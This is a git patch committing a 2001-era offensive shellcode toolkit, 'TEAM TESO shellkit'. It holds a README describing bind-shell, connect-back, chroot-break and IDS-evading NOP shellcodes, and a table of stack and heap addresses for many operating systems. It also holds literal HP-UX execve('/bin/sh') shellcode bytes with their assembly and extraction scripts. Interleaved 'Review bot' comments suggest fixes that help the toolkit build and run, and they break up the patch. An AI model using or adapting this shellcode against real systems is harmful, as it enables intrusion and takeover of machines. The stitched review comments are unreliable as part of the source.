From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 
From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/Makefile | 24 ++ other/shellkit/README | 187 +++++++++++ other/shellkit/SYSTEMS | 134 ++++++++ other/shellkit/codedump.c | 93 ++++++ other/shellkit/hppa.c | 12 + other/shellkit/hppa.h | 7 + other/shellkit/hppa.o | Bin 0 -> 8212 bytes other/shellkit/hppa_hpux.c | 36 +++ other/shellkit/hppa_hpux.h | 10 + other/shellkit/hppa_hpux.o | Bin 0 -> 9000 bytes other/shellkit/hppa_hpux/Makefile | 14 + other/shellkit/hppa_hpux/build.sh | 57 ++++ other/shellkit/hppa_hpux/execvesh.s | 36 +++ other/shellkit/hppa_hpux/execvesh.s-backup | 32 ++ other/shellkit/mips.c | 143 +++++++++ other/shellkit/mips.h | 19 ++ other/shellkit/mips.o | Bin 0 -> 13276 bytes other/shellkit/mips_irix.c | 231 ++++++++++++++ other/shellkit/mips_irix.h | 17 + other/shellkit/mips_irix.o | Bin 0 -> 13984 bytes other/shellkit/mips_irix/Makefile | 22 ++ other/shellkit/mips_irix/README | 25 ++ other/shellkit/mips_irix/chmod.s | 49 +++ other/shellkit/mips_irix/chroot.s | 60 ++++ other/shellkit/mips_irix/connectsh.s | 109 +++++++ other/shellkit/mips_irix/execvesh.s | 36 +++ other/shellkit/mips_irix/exit.s | 29 ++ other/shellkit/mips_irix/portshellsh.s | 126 ++++++++ other/shellkit/mips_irix/read.s | 51 +++ other/shellkit/mips_irix/setgid.s | 30 ++ other/shellkit/mips_irix/setreuid.s | 32 ++ other/shellkit/shellcode.c | 61 ++++ other/shellkit/shellcode.h | 62 ++++ other/shellkit/shellcode.o | Bin 0 -> 11192 bytes other/shellkit/shellkit | Bin 0 -> 122697 bytes other/shellkit/shellkit.c | 123 +++++++ other/shellkit/shellkit.h | 31 ++ other/shellkit/sparc.c | 140 ++++++++ other/shellkit/sparc.h | 10 + other/shellkit/sparc.o | Bin 0 -> 13216 bytes other/shellkit/sparc_solaris.c | 58 ++++ other/shellkit/sparc_solaris.h | 6 + other/shellkit/sparc_solaris.o | Bin 0 -> 9628 bytes other/shellkit/sparc_solaris/AUTHORS | 2 + other/shellkit/sparc_solaris/NOTES | 11 + other/shellkit/sparc_solaris/execve.s | 20 ++ 
other/shellkit/sparc_solaris/exit.s | 10 + other/shellkit/sparc_solaris/setgid.s | 12 + other/shellkit/sparc_solaris/setreuid.s | 14 + other/shellkit/splocoder | Bin 0 -> 16519 bytes other/shellkit/splocoder.c | 184 +++++++++++ other/shellkit/tmp/hpux-tools.tar.gz | Bin 0 -> 2550 bytes other/shellkit/tmp/hpux-tools/Makefile | 5 + other/shellkit/tmp/hpux-tools/README | 10 + other/shellkit/tmp/hpux-tools/sample-one/Makefile | 10 + other/shellkit/tmp/hpux-tools/sample-one/README | 5 + other/shellkit/tmp/hpux-tools/sample-one/exploit.c | 123 +++++++ other/shellkit/tmp/hpux-tools/sample-one/vuln.c | 34 ++ other/shellkit/tmp/hpux-tools/shell-one.s | 39 +++ other/shellkit/tmp/hpux-tools/shell-tree.s | 31 ++ other/shellkit/tmp/hpux-tools/shell-two.s | 41 +++ other/shellkit/tmp/hpux_bof.pdf | Bin 0 -> 243787 bytes other/shellkit/x86.c | 124 ++++++++ other/shellkit/x86.h | 21 ++ other/shellkit/x86.o | Bin 0 -> 12280 bytes other/shellkit/x86_bsd.c | 73 +++++ other/shellkit/x86_bsd.h | 12 + other/shellkit/x86_bsd.o | Bin 0 -> 9768 bytes other/shellkit/x86_bsd/FIXME_chmod.s | 43 +++ other/shellkit/x86_bsd/bindshell.s | 59 ++++ other/shellkit/x86_bsd/connectsh | Bin 0 -> 6100 bytes other/shellkit/x86_bsd/connectsh.s | 51 +++ other/shellkit/x86_bsd/execvesh | Bin 0 -> 6034 bytes other/shellkit/x86_bsd/execvesh.s | 31 ++ other/shellkit/x86_bsd/exit.s | 18 ++ other/shellkit/x86_bsd/spset.s | 36 +++ other/shellkit/x86_linux.c | 352 +++++++++++++++++++++ other/shellkit/x86_linux.h | 32 ++ other/shellkit/x86_linux.o | Bin 0 -> 20216 bytes other/shellkit/x86_linux/AUTHORS | 5 + other/shellkit/x86_linux/chmod.s | 23 ++ other/shellkit/x86_linux/chroot.s | 34 ++ other/shellkit/x86_linux/codedump | Bin 0 -> 6244 bytes other/shellkit/x86_linux/connect.s | 61 ++++ other/shellkit/x86_linux/execve | Bin 0 -> 5988 bytes other/shellkit/x86_linux/execve.s | 22 ++ other/shellkit/x86_linux/exit.s | 14 + other/shellkit/x86_linux/portshell.s | 73 +++++ other/shellkit/x86_linux/portshell_slice.s | 77 
+++++ other/shellkit/x86_linux/read.s | 22 ++ other/shellkit/x86_linux/setgid.s | 14 + other/shellkit/x86_linux/setreuid.s | 16 + other/shellkit/x86_linux/setuid.s | 14 + other/shellkit/x86_linux/spset.s | 36 +++ other/shellkit/x86_linux/xor.s | 24 ++ other/shellkit/x86_noptest.c | 25 ++ other/shellkit/x86_solaris/README | 7 + other/shellkit/x86_solaris/bindshell.s | 68 ++++ other/shellkit/x86_solaris/connectsh.s | 60 ++++ other/shellkit/x86_solaris/execve.s | 32 ++ other/shellkit/x86_solaris/exit.s | 24 ++ 101 files changed, 4166 insertions(+) create mode 100644 other/shellkit/Makefile create mode 100644 other/shellkit/README create mode 100644 other/shellkit/SYSTEMS create mode 100644 other/shellkit/codedump.c create mode 100644 other/shellkit/hppa.c create mode 100644 other/shellkit/hppa.h create mode 100644 other/shellkit/hppa.o create mode 100644 other/shellkit/hppa_hpux.c create mode 100644 other/shellkit/hppa_hpux.h create mode 100644 other/shellkit/hppa_hpux.o create mode 100644 other/shellkit/hppa_hpux/Makefile create mode 100644 other/shellkit/hppa_hpux/build.sh create mode 100644 other/shellkit/hppa_hpux/execvesh.s create mode 100644 other/shellkit/hppa_hpux/execvesh.s-backup create mode 100644 other/shellkit/mips.c create mode 100644 other/shellkit/mips.h create mode 100644 other/shellkit/mips.o create mode 100644 other/shellkit/mips_irix.c create mode 100644 other/shellkit/mips_irix.h create mode 100644 other/shellkit/mips_irix.o create mode 100644 other/shellkit/mips_irix/Makefile create mode 100644 other/shellkit/mips_irix/README create mode 100644 other/shellkit/mips_irix/chmod.s create mode 100644 other/shellkit/mips_irix/chroot.s create mode 100644 other/shellkit/mips_irix/connectsh.s create mode 100644 other/shellkit/mips_irix/execvesh.s create mode 100644 other/shellkit/mips_irix/exit.s create mode 100644 other/shellkit/mips_irix/portshellsh.s create mode 100644 other/shellkit/mips_irix/read.s create mode 100644 other/shellkit/mips_irix/setgid.s 
create mode 100644 other/shellkit/mips_irix/setreuid.s create mode 100644 other/shellkit/shellcode.c create mode 100644 other/shellkit/shellcode.h create mode 100644 other/shellkit/shellcode.o create mode 100644 other/shellkit/shellkit create mode 100644 other/shellkit/shellkit.c create mode 100644 other/shellkit/shellkit.h create mode 100644 other/shellkit/sparc.c create mode 100644 other/shellkit/sparc.h create mode 100644 other/shellkit/sparc.o create mode 100644 other/shellkit/sparc_solaris.c create mode 100644 other/shellkit/sparc_solaris.h create mode 100644 other/shellkit/sparc_solaris.o create mode 100644 other/shellkit/sparc_solaris/AUTHORS create mode 100644 other/shellkit/sparc_solaris/NOTES create mode 100644 other/shellkit/sparc_solaris/execve.s create mode 100644 other/shellkit/sparc_solaris/exit.s create mode 100644 other/shellkit/sparc_solaris/setgid.s create mode 100644 other/shellkit/sparc_solaris/setreuid.s create mode 100644 other/shellkit/splocoder create mode 100644 other/shellkit/splocoder.c create mode 100644 other/shellkit/tmp/hpux-tools.tar.gz create mode 100644 other/shellkit/tmp/hpux-tools/Makefile create mode 100644 other/shellkit/tmp/hpux-tools/README create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/Makefile create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/README create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/exploit.c create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/vuln.c create mode 100644 other/shellkit/tmp/hpux-tools/shell-one.s create mode 100644 other/shellkit/tmp/hpux-tools/shell-tree.s create mode 100644 other/shellkit/tmp/hpux-tools/shell-two.s create mode 100644 other/shellkit/tmp/hpux_bof.pdf create mode 100644 other/shellkit/x86.c create mode 100644 other/shellkit/x86.h create mode 100644 other/shellkit/x86.o create mode 100644 other/shellkit/x86_bsd.c create mode 100644 other/shellkit/x86_bsd.h create mode 100644 other/shellkit/x86_bsd.o create mode 100644 
other/shellkit/x86_bsd/FIXME_chmod.s create mode 100644 other/shellkit/x86_bsd/bindshell.s create mode 100644 other/shellkit/x86_bsd/connectsh create mode 100644 other/shellkit/x86_bsd/connectsh.s create mode 100644 other/shellkit/x86_bsd/execvesh create mode 100644 other/shellkit/x86_bsd/execvesh.s create mode 100644 other/shellkit/x86_bsd/exit.s create mode 100644 other/shellkit/x86_bsd/spset.s create mode 100644 other/shellkit/x86_linux.c create mode 100644 other/shellkit/x86_linux.h create mode 100644 other/shellkit/x86_linux.o create mode 100644 other/shellkit/x86_linux/AUTHORS create mode 100644 other/shellkit/x86_linux/chmod.s create mode 100644 other/shellkit/x86_linux/chroot.s create mode 100644 other/shellkit/x86_linux/codedump create mode 100644 other/shellkit/x86_linux/connect.s create mode 100644 other/shellkit/x86_linux/execve create mode 100644 other/shellkit/x86_linux/execve.s create mode 100644 other/shellkit/x86_linux/exit.s create mode 100644 other/shellkit/x86_linux/portshell.s create mode 100644 other/shellkit/x86_linux/portshell_slice.s create mode 100644 other/shellkit/x86_linux/read.s create mode 100644 other/shellkit/x86_linux/setgid.s create mode 100644 other/shellkit/x86_linux/setreuid.s create mode 100644 other/shellkit/x86_linux/setuid.s create mode 100644 other/shellkit/x86_linux/spset.s create mode 100644 other/shellkit/x86_linux/xor.s create mode 100644 other/shellkit/x86_noptest.c create mode 100644 other/shellkit/x86_solaris/README create mode 100644 other/shellkit/x86_solaris/bindshell.s create mode 100644 other/shellkit/x86_solaris/connectsh.s create mode 100644 other/shellkit/x86_solaris/execve.s create mode 100644 other/shellkit/x86_solaris/exit.s (limited to 'other/shellkit') diff --git a/other/shellkit/Makefile b/other/shellkit/Makefile new file mode 100644 index 0000000..ff69bd9 --- /dev/null +++ b/other/shellkit/Makefile 
@@ -0,0 +1,24 @@
+
+#DFLAGS=-O2
+DFLAGS=-g -ggdb
+CC=gcc
+CFLAGS=$(DFLAGS) -Wall
+OBJS= shellcode.o \
+ hppa.o hppa_hpux.o \
+ mips.o mips_irix.o \
+ sparc.o sparc_solaris.o \
+ x86.o x86_bsd.o x86_linux.o \
+
+all: shellkit splocoder
+
+clean:
+ rm -f *.o shellkit
+ rm -f splocoder
+
+shellkit: $(OBJS)
+ $(CC) $(CFLAGS) -o shellkit shellkit.c $(OBJS)
+
+splocoder: splocoder.c
+ $(CC) $(CFLAGS) -o splocoder splocoder.c
+
+
diff --git a/other/shellkit/README b/other/shellkit/README
new file mode 100644
index 0000000..1c8b252
--- /dev/null
+++ b/other/shellkit/README
@@ -0,0 +1,187 @@ + +TEAM TESO shellkit - your complete shellcode toolkit +==================================================== +preliminary README file + + +Conditions and rules to be obeyed by the shellcodes +=================================================== + +To construct generic shellcodes one has to state the exact details and +requirements of each shellcode. The list below is what every shellcode within +the shellkit has to obey. + +Conditions the shellcode encounters: + + - Shellcode memory itself is writeable + - No register being properly set except the stack pointer + +Requirements to the shellcode: + + - Do not contain NUL (0x00), line-termination (0x0a, 0x0d) and + format-directive (0x25 = '%') bytes + - Do not expect to be terminated by a NUL ('\0') character + - Working on heap and stack (i.e. any writeable and executeable memory) + +Suggestions (i.e. should be ...): + + - Well tested on most common systems to be expected on the + architecture the shellcode runs on (i.e Solaris 2.[5678] on sparc, + IRIX 5.3, 6.[2345] on mips) + - Optimized for (in order of importance): stability, size + + +Types of shellcodes to create +============================= + +This is a UNIX listing, since most shellcodes are not doable on Windows, so +this listing is for Unix derivates only. For the "configureable" values of the +shellcodes there are setup functions to set the values within the shellcode. + +The listing is split into three different categories: chainables, local and +remote. The chainable codes work as stubs to prepend other shellcodes with. +This is done change certain settings in the environment, such as getting rid of +chroot, certain uid's and the like. The local shellcodes are for use in locally +exploitable vulnerabilities, while the remote shellcodes are designed to assist +you with remote exploitation over the network. 
+ + +Chainables (6 codes) +-------------------- +Chainable shellcodes should not influence the processing of the following +shellcode in violation to the condition above. + + - chrootbreak, which breaks out of a chroot environment if possible on that + architecture (using the best and most promising method) + - read(fd, behind-myself, len), which reads len bytes from fd behind itself + and executes them. on certain architectures special considerations for + cache problems have to be obeyed + - setreuid(?,?), which sets the (e)uid to a configureable value + - setgid(?), which sets the gid to a configurable value + - spset, which sets the stackpointer before the shellcode + + - nop shellcode (see below for description) + +The "nop shellcode" is actually a function that will create a variadic amount +of nop space which is not just one opcode but a mix. This is done to evade IDS +systems. The generated nop-code should behave the same way a normal chainable +shellcode would (i.e. not violating the conditions of the shellcode). + + +Local (2 codes) +--------------- + - chmod/chown/exit, which chowns and chmods a pathname of your choice, then + exits + - execve-sh, which executes a /bin/sh + - exit, which will just exit with an undetermined exit code + + +Remote (2 codes) +---------------- + - portshell-sh, which listens on a defineable port and executes a /bin/sh + once a connection is experienced + - connect-sh, which connects to a defineable ip and port and executes a + /bin/sh once it is connected + + +Architectures +============= + +arch os person(s) +------- --------------- ----------------------------------------- +HPPA HP-UX caddis +MIPS IRIX scut +RS6000 AIX edi +SPARC Solaris caddis, skyper +x86 Solaris plasmoid +x86 Windows NT halvar +x86 Linux lorian, smiler +x86 *BSD dvorak, smiler +------- --------------- ----------------------------------------- + + +Developing +========== + +Please include all custom build utilities, Makefiles (!) 
and maybe specific +README files in the appropiate directory, so other people can join the fun or +modify the codes at source level. + + +Testing +======= + +The shellcodes have to be tested thoroughly and on as much different systems as +possible. + + +Naming +====== + +Code Strings + + -- + +arch is one of: + + hppa + mips + rs6000 + sparc + x86 + +os is one of: + + aix + bsd + hpux + irix + linux + solaris + windowsnt + +code is one of: + + chmod + chroot + connectsh + execvesh + exit + portshellsh + read + setreuid + setgid + spset + +Example: The portshell shellcode for the MIPS architecture under the IRIX + operating system would be identified with "mips-irix-portshellsh" + + +Additional information +====================== + +Please use the included 'splocoder' utility to dump important system +information of the various architectures. There will be a documentation of what +the fields mean and how they can be used. Soon. + + +Credits +======= + +This shellcode toolkit is the result of the hard work of numerous persons, here +is a list of the persons involved. + +XXX/TODO: update, add missing persons + + acpizer - splocoder + lorian - x86 linux/bsd codes + palmers - x86 linux codes + scut - mips irix, hppa hpux codes, framework and docs + smiler - x86 bsd codes + stealth - x86 bsd codes + + +== +vi:fo=tcrq:tw=79: + + diff --git a/other/shellkit/SYSTEMS b/other/shellkit/SYSTEMS new file mode 100644 index 0000000..33f09af --- /dev/null +++ b/other/shellkit/SYSTEMS 
@@ -0,0 +1,134 @@ +# splocoder output database -- team teso +# add your system here +# +# thanks to all the people who send me in fingerprints, you know who you are +# :-) + +# BSD systems +FreeBSD-4.2-RELEASE-i386 le stackdown 4 4 + data bss stack env 08049a70 08049c80 bfbffa60 bfbffb64 + M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040 + +FreeBSD-4.3-RC-i386 le stackdown 4 4 + data bss stack env 08049a70 08049c80 bfbffa78 bfbffb7c + M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040 + +FreeBSD-4.3-RELEASE-i386 le stackdown 4 4 + data bss stack env 08049a70 08049c80 bfbffba0 bfbffca4 + M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040 + +NetBSD-1.5-i386 le stackdown 4 4 + data bss stack env 08049dd8 08049fe0 bfbfd614 bfbfdb6c + M: zero neg big small tiny 0805c030 00000000 0805d000 0815d000 0805c040 + +OpenBSD-2.6-i386 le stackdown 4 4 + data bss stack env 000030e8 0000313c dfbfd958 dfbfdeac + M: zero neg big small tiny 00015030 00000000 00016000 00116000 00015040 + +OpenBSD-2.8-alpha le stackdown 4 8 + data bss stack env 12001d0d5 12001dff8 1fffff810 1fffff890 + M: zero neg big small tiny 120026060 00000000 120028000 120128000 120026070 + +OpenBSD-2.8-i386 le stackdown 4 4 + data bss stack env 000030ec 00003148 dfbfd658 dfbfdbac + M: zero neg big small tiny 00015030 00000000 00016000 00116000 00015040 + +OpenBSD-2.9-i386 le stackdown 4 4 + data bss stack env 000030ec 00003148 dfbfd3dc dfbfd930 + M: zero neg big small tiny 00007030 00000000 00008000 00108000 00007040 + +OpenBSD-2.9-sparc be stackdown 4 4 + data bss stack env 00004110 00004178 f7fff5d8 f7fffb4c + M: zero neg big small tiny 00016030 00000000 00017000 00117000 00016040 + +# HPUX systems +HP-UX-B.10.20-9000/715 be stackup 4 4 + data bss stack env 400010c0 40001188 7b03a530 7b03a3ac + M: zero neg big small tiny 400031e0 00000000 400031e8 401031f0 40103260 + +HP-UX-B.10.20-9000/735 be stackup 4 4 + data bss stack env 400010c0 40001188 
7b03a590 7b03a414 + M: zero neg big small tiny 400031e0 00000000 400031e8 401031f0 40103260 + +# IRIX systems +IRIX-6.5-IP20 be stackdown 4 4 + data bss stack env 100132f8 10013410 7fff2f00 7fff2f6c + M: zero neg big small tiny 10014010 10014020 10014090 10114098 10014030 + +IRIX64-6.5-IP27 be stackdown 4 4 + data bss stack env 100140f8 100141c0 7ffe3e70 7ffe3f1c + M: zero neg big small tiny 10015010 10015020 10015090 10115098 10015030 + +# Linux systems +Linux-2.2.13-i486 le stackdown 4 4 + data bss stack env 080499f0 08049b20 bffff7a8 bffff98c + M: zero neg big small tiny 08049b90 00000000 40117008 08049ba0 08049c08 + +Linux-2.2.19-i586 le stackdown 4 4 + data bss stack env 08049a10 08049b40 bffff3e8 bffff5cc + M: zero neg big small tiny 08049d40 00000000 00227008 08049d50 08049db8 + +Linux-2.2.1-mips le stackdown 4 4 + data bss stack env 10000020 100000d4 7ffffb10 7ffffbdc + M: zero neg big small tiny 10000150 00000000 2ac2d008 10000160 100001c8 + +Linux-2.2.19pre17-i686 le stackdown 4 4 + data bss stack env 080499d0 08049ae0 bffffbac bffffdac + M: zero neg big small tiny 08049b50 00000000 400f3008 08049b60 08049bc8 + +Linux-2.2.19-sparc64 be stackdown 4 4 + data bss stack env 00021ef0 000220e4 effffb68 effffdcc + M: zero neg big small tiny 00022138 00000000 7012e008 00022148 000221b0 + +Linux-2.4.6-i686 le stackdown 4 4 + data bss stack env 08049d50 08049e60 bffff9ac bffffbac + M: zero neg big small tiny 08049ed0 00000000 40142008 08049ee0 08049f48 + +Linux-2.4.7-4GB-i686 le stackdown 4 4 + data bss stack env 08049a4c 08049b60 bfffefac bffff1ac + M: zero neg big small tiny 08049bd0 00000000 40143008 08049be0 08049c48 + +Linux-2.4.4-ppc be stackdown 4 4 + data bss stack env 10010fa8 1001107c 7ffff9d8 7ffffa8c + M: zero neg big small tiny 100111a8 00000000 30028008 100111b8 10011220 + +Linux-2.4.8-sparc64 be stackdown 4 4 + data bss stack env 00021ef0 00022100 effff868 effffacc + M: zero neg big small tiny 00022150 00000000 70170008 + +# alpha +OSF1-V5.0-alpha le 
stackdown 4 8 + data bss stack env 1400001b8 140000300 11fffbf50 11fffc028 + M: zero neg big small tiny 00000000 00000000 140004000 140002100 140002180 + +# Solaris systems +SunOS-5.6-sun4u be stackdown 4 4 + data bss stack env 00021284 00021470 effff5da effffb54 + M: zero neg big small tiny 00021488 00000000 00021888 00121890 00021498 + +SunOS-5.7-sun4u be stackdown 4 4 + data bss stack env 00021190 00021350 ffbef3a0 ffbef92c + M: zero neg big small tiny 00021368 00000000 00021768 00121770 00021378 + +SunOS-5.8-sun4d be stackdown 4 4 + data bss stack env 00020d10 00021008 dffff3e0 dffff9dc + M: zero neg big small tiny 00021060 00000000 00021460 00121468 00021070 + +SunOS-5.8-sun4m be stackdown 4 4 + data bss stack env 00021180 00021340 effff808 effffd94 + M: zero neg big small tiny 00021358 00021368 00021758 00121760 00021378 + +SunOS-5.8-sun4u be stackdown 4 4 + data bss stack env 00020d00 00020ff4 ffbeefe8 ffbef5e4 + M: zero neg big small tiny 00021050 00021060 00021450 00121458 00021070 + +# exotics +CYGWIN_NT-4.0-1.1.6(0.30/3/2) le stackdown 4 4 + data bss stack env 00402004 0040305c 0240fe34 0a010008 + M: zero neg big small tiny 0a0104c0 0a0104d0 0a0104e0 0a1104e8 0a110550 + +CYGWIN_NT-5.0-1.3.3s(0.44/3/2) le stackdown 4 4 + data bss stack env 00402004 0040305c 0240fe34 0a010008 + M: zero neg big small tiny 0a0104b8 0a0104c8 0a0104d8 0a1104e0 0a110548 + + diff --git a/other/shellkit/codedump.c b/other/shellkit/codedump.c new file mode 100644 index 0000000..9494b9e --- /dev/null +++ b/other/shellkit/codedump.c 
@@ -0,0 +1,93 @@ +/* shellcode extraction utility, + * by type / teso, small mods by scut. + */ + + +#include +#include +#include + +#ifdef IRIX +#include +#endif + +#ifdef HPUX +extern char * cbegin; +extern char * cend; +#else +extern void cbegin (); +extern void cend (); +#endif + +typedef void (* fptr)(void); + +int +bad (unsigned char u); + + +int +main (int argc, char *argv[]) +{ + int i, + bbytes = 0; + unsigned char * buf = (unsigned char *) cbegin; + + unsigned char ebuf[1024]; + fptr ebuf_p = (fptr) &ebuf[0]; + + + fprintf (stderr, "/* %lu byte shellcode */\n", + (unsigned long int) cend - (unsigned long int) cbegin); + + for (i = 0 ; buf < (unsigned char *) cend; ++buf) { + if (i % 12 == 0 && buf > (unsigned char *) cbegin) + printf ("\n"); + if (i % 12 == 0) + printf ("\""); + + if (bad (*buf & 0xff)) { + printf ("_\\x%02x_", *buf & 0xff); + bbytes += 1; + } else { + printf ("\\x%02x", *buf & 0xff); + } + + if (++i >= 12) { + i = 0; + printf ("\""); + } + } + if (i % 12 == 0) + printf (";\n"); + else + printf ("\";\n"); + + printf("\n"); + + fprintf (stderr, "bad bytes = %d\n", bbytes); + + if (argc > 1) { + memcpy (ebuf, cbegin, (unsigned long int) cend - + (unsigned long int) cbegin); +#ifdef IRIX + memcpy (ebuf + ((unsigned long int) cend - + (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40); + cacheflush (ebuf, sizeof (ebuf), BCACHE); +#endif + ebuf_p (); + } + + exit (EXIT_SUCCESS); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + + diff --git a/other/shellkit/hppa.c b/other/shellkit/hppa.c new file mode 100644 index 0000000..462b017 --- /dev/null +++ b/other/shellkit/hppa.c @@ -0,0 +1,12 @@ +/* hppa.c - generic pa-risc functions + * + * by team teso + */ + +#include +#include +#include "shellcode.h" +#include "hppa.h" + + + diff --git a/other/shellkit/hppa.h b/other/shellkit/hppa.h new file mode 100644 index 0000000..f325a5f 
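Review bot: `memcpy (ebuf, cbegin, ...)` in main copies the whole cbegin..cend range into the fixed 1024-byte `ebuf` with no size check, and the IRIX branch then appends 40 more bytes at that offset, so a code range near or above 1024 bytes overruns the stack before `ebuf_p ()` is reached. Guard it before the copy: `if ((unsigned long int) cend - (unsigned long int) cbegin > sizeof ebuf - 40) { fprintf (stderr, "code exceeds ebuf\n"); exit (EXIT_FAILURE); }`. The 40-byte IRIX memcpy also reads past its string literal, which is 35 characters plus the terminator, so 4 bytes come from beyond the object. The `#include` lines carry no header names in this rendering, which looks like extraction loss rather than the committed source; worth confirming against the file.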
--- /dev/null
+++ b/other/shellkit/hppa.h
@@ -0,0 +1,7 @@
+
+#ifndef HPPA_H
+#define HPPA_H
+
+
+#endif
+
diff --git a/other/shellkit/hppa.o b/other/shellkit/hppa.o
new file mode 100644
index 0000000..e54e3fe
Binary files /dev/null and b/other/shellkit/hppa.o differ
diff --git a/other/shellkit/hppa_hpux.c b/other/shellkit/hppa_hpux.c
new file mode 100644
index 0000000..815fdaf
--- /dev/null
+++ b/other/shellkit/hppa_hpux.c
@@ -0,0 +1,36 @@
+
+#include
+#include
+#include
+#include "shellcode.h"
+#include "hppa.h"
+
+
+/* tested on: HP-UX B.10.20 A 9000/735
+ * lsd people used execv, we use execve, which enlarges our code by 12
+ * bytes
+ */
+shellcode hppa_hpux_execvesh = {
+ "hppa-hpux-execvesh",
+ 48,
+ "\xeb\x5f\x1f\xfd\xb4\x16\x70\x76\xb7\x5a\x40\x3a"
+ "\x0f\xc0\x12\x88\x0f\xda\x12\x80\x0b\xc0\x02\x99"
+ "\x0b\x18\x02\x98\x22\xa0\x08\x01\xe6\xa0\xe0\x08"
+ "\x0f\x40\x12\x0e\x2f\x62\x69\x6e\x2f\x73\x68\x41",
+};
+
+
+shellcode * hppa_hpux_shellcodes[] = {
+ &hppa_hpux_execvesh,
+ NULL,
+};
+
+arch hppa_hpux = {
+ "hppa-hpux",
+ 4,
+ NULL /* hppa_nop */,
+ hppa_hpux_shellcodes,
+};
+
+
+
diff --git a/other/shellkit/hppa_hpux.h b/other/shellkit/hppa_hpux.h
new file mode 100644
index 0000000..0b53da2
--- /dev/null
+++ b/other/shellkit/hppa_hpux.h
@@ -0,0 +1,10 @@
+
+#ifndef HPPA_HPUX_H
+#define HPPA_HPUX_H
+
+#include "shellcode.h"
+
+arch hppa_hpux;
+
+#endif
+
diff --git a/other/shellkit/hppa_hpux.o b/other/shellkit/hppa_hpux.o
new file mode 100644
index 0000000..28141b6
Binary files /dev/null and b/other/shellkit/hppa_hpux.o differ
diff --git a/other/shellkit/hppa_hpux/Makefile b/other/shellkit/hppa_hpux/Makefile
new file mode 100644
index 0000000..41621dd
--- /dev/null
+++ b/other/shellkit/hppa_hpux/Makefile
@@ -0,0 +1,14 @@
+
+#DFLAGS=-O2
+DFLAGS=-g -ggdb
+CC=gcc
+CFLAGS=$(DFLAGS) -Wall
+
+all:
+ $(CC) $(CFLAGS) -o execvesh execvesh.s
+
+clean:
+ rm -f *.o
+ rm -f chmod chroot connectsh execvesh exit portshellsh read \
+ setgid setreuid
+
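Review bot: `arch hppa_hpux;` in hppa_hpux.h is a tentative definition rather than a declaration, so every translation unit that includes the header defines the object and a link with `-fno-common` (the default on current gcc) rejects shellkit.c plus hppa_hpux.o as duplicate symbols. Declare it as `extern arch hppa_hpux;` and keep the definition in hppa_hpux.c only. The other per-platform headers in the diffstat (mips_irix.h, sparc_solaris.h, x86_bsd.h, x86_linux.h) are outside this chunk but presumably follow the same template and would need the same change.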
diff --git a/other/shellkit/hppa_hpux/build.sh b/other/shellkit/hppa_hpux/build.sh new file mode 100644 index 0000000..5a77f25 --- /dev/null +++ b/other/shellkit/hppa_hpux/build.sh @@ -0,0 +1,57 @@ +#!/bin/sh + +#c89 -c -o object.o $1 +#objdump -D cbegin $1 | egrep "[0-9a-f]+:" | cut -c 7- | \ +# awk '{ printf ("\t\"\\x%s\\x%s\\x%s\\x%s\"\t/* %s\t*/\n", \ +# $1, $2, $3, $4, $5 $6 $7 $8 $9) }' > \ +# object.h +#gcc -o $2 ../codedump.c -DHPUX +#rm -f object.h + +# i knew learning awk would repay some day ;-P +objdump -D execvesh | \ +awk ' + function pbyte (CHAR) { + if (match (CHAR, /(00)|(0a)|(0d)|(25)/)) + printf ("_"); + printf ("\\x%s", CHAR); + if (match (CHAR, /(00)|(0a)|(0d)|(25)/)) + printf ("_"); + return; + } + + BEGIN { + foo = 0; + } + + /cbegin/ { + foo = 1; + ccount = 0; + printf ("unsigned char shellcode[] ="); + } + + foo == 1 && /cend/ { + foo = 0; + if (ccount == 0) { + printf (";\n"); + } else { + printf ("\";\n"); + } + } + + foo == 1 && /[0123456789abcdef]+\:/ { + if (ccount == 0) { + printf ("\n\t\""); + } + pbyte($2); + pbyte($3); + pbyte($4); + pbyte($5); + ccount += 4; + + if (ccount == 12) { + ccount = 0; + printf ("\"") + } + }' + diff --git a/other/shellkit/hppa_hpux/execvesh.s b/other/shellkit/hppa_hpux/execvesh.s new file mode 100644 index 0000000..49b1b33 --- /dev/null +++ b/other/shellkit/hppa_hpux/execvesh.s @@ -0,0 +1,36 @@ + + .LEVEL 1.1 + + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + bl cbegin, %r1 + nop + + .align 4 + + .SUBSPA $DATA$ + .EXPORT cbegin + +cbegin + bl moo,%r26 +moo + addi,> 0x3b,%r0,%r22 + addi,< 0x1d,%r26,%r26 + stw %r0,4(%sp) + stw %r26,0(%sp) + xor %r0,%sp,%r25 + xor %r24,%r24,%r24 + + ldil L%0xc0000004,%r21 + ble R%0xc0000004(%sr7,%r21) + stbs %r0,7(%r26) + + .STRING "/bin/sh\x41" + + .EXPORT cend +cend + nop + 
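Review bot: `objdump -D execvesh` hardcodes its single input even though the commented-out pipeline above it took `$1` and the sibling Makefile's clean target lists nine binaries, so dumping any other code here means editing the script. Writing it as `objdump -D "${1:-execvesh}" | \` keeps the current default and accepts a path. A short header comment stating the script's output contract would also help, e.g. `# emits a C array initializer for the bytes between cbegin and cend; bytes 00/0a/0d/25 are wrapped in _ so they stand out`.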
